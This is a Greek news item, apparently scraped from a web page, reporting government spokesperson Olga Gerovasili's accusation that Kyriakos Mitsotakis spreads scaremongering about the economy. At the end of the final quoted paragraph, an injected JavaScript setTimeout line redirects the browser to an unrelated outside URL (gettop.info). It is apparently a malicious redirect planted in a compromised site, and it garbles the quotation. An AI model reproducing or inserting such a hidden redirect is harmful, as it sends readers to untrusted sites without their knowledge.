Κυβέρνηση: Ο κ. Μητσοτάκης τρομοκρατεί την κοινή γνώμη

0
10

 

Για «ασύστολη κινδυνολογία» κατηγόρησε τον πρόεδρο της Ν.Δ. , η κυβερνητική εκπρόσωπος Όλγα Γεροβασίλη, με αφορμή την επίθεση που εξαπέλυσε ο Κυριάκος Μητσοτάκης, στον Αλέξη Τσίπρα για την οικονομία.

«Μπροστά στο πολιτικό αδιέξοδο και την χρεοκοπία της πολιτικής του, ο κ. Μητσοτάκης δεν έχει άλλο καταφύγιο πέρα από την ασύστολη κινδυνολογία. Αναζητά διαρκώς ευκαιρία να τρομοκρατήσει την κοινή γνώμη, ανακαλύπτοντας «μπαμπούλες» που υπάρχουν μόνο στους μύχιους πόθους του. Το ίδιο έκανε στην πρώτη διαπραγμάτευση, το ίδιο κάνει και τώρα», αναφέρει η Ολγα Γεροβασίλη.

«Δυστυχώς γι αυτόν, η διαπραγμάτευση προχωρά κανονικά και οι πολίτες αρνούνται να τον πάρουν στα σοβαρά. Γι αυτό, τον καλούμε να αναζητήσει άλλον τρόπο, προκειμένου να βγάλει το κόμμα του από το βαθύ πολιτικό τέλμα στο οποίο είναι εγκλωβισμένο», επισημαίνει η κυβερνητική εκπρόσωπος.

«Όσο για τις «προειδοποιήσεις του», ας τις στρέψει καλύτερα στον αντιπρόεδρο της ΝΔ κ. Γεωργιάδη, που περιφέρεται από ραδιόφωνο σε ραδιόφωνο, υβρίζοντας με γλώσσα πεζοδρομίου και απειλώντας με αντίποινα δημοσιογράφους, των οποίων η άποψη δεν του είναι αρεστή. Δυστυχώς, αυτή είναι η Νέα Δημοκρατία». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here